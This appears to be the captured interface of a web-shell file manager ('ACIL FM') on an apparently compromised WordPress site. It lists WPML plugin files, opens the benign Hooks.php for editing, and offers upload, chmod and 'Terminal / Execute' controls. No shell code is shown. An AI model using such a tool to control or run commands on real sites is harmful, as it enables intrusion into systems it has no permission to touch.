ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/classes/db-mappers
/
home
mhhtmff
www
site
wp-content
plugins
wpml-string-translation
classes
db-mappers
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
class-wpml-st-bulk-strings-insert.php
2.63 MB
chmod
View
DL
Edit
Rename
Delete
class-wpml-st-bulk-update-strings-status.php
7.41 MB
chmod
View
DL
Edit
Rename
Delete
class-wpml-st-db-mappers-string-positions.php
1.86 MB
chmod
View
DL
Edit
Rename
Delete
class-wpml-st-db-mappers-strings.php
1.21 MB
chmod
View
DL
Edit
Rename
Delete
class-wpml-st-models-string-translation.php
1.07 MB
chmod
View
DL
Edit
Rename
Delete
class-wpml-st-models-string.php
1.55 MB
chmod
View
DL
Edit
Rename
Delete
DomainsRepository.php
588 B
chmod
View
DL
Edit
Rename
Delete
Hooks.php
591 B
chmod
View
DL
Edit
Rename
Delete
StringsRetrieve.php
2.44 MB
chmod
View
DL
Edit
Rename
Delete
StringTranslations.php
684 B
chmod
View
DL
Edit
Rename
Delete
Update.php
1.09 MB
chmod
View
DL
Edit
Rename
Delete
wpml-st-word-count-package-records.php
3.43 MB
chmod
View
DL
Edit
Rename
Delete
wpml-st-word-count-string-records.php
2.86 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/wpml-string-translation/classes/db-mappers/Hooks.php
<?php namespace WPML\ST\DB\Mappers; use function WPML\Container\make; use function WPML\FP\partial; class Hooks implements \IWPML_Action, \IWPML_Backend_Action, \IWPML_Frontend_Action { public function add_hooks() { $getStringById = [ make( \WPML_ST_DB_Mappers_Strings::class ), 'getById' ]; $moveStringToDomain = partial( [ Update::class, 'moveStringToDomain' ], $getStringById ); add_action( 'wpml_st_move_string_to_domain', $moveStringToDomain, 10, 2 ); add_action( 'wpml_st_move_all_strings_to_new_domain', [ Update::class, 'moveAllStringsToNewDomain' ], 10, 2 ); } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply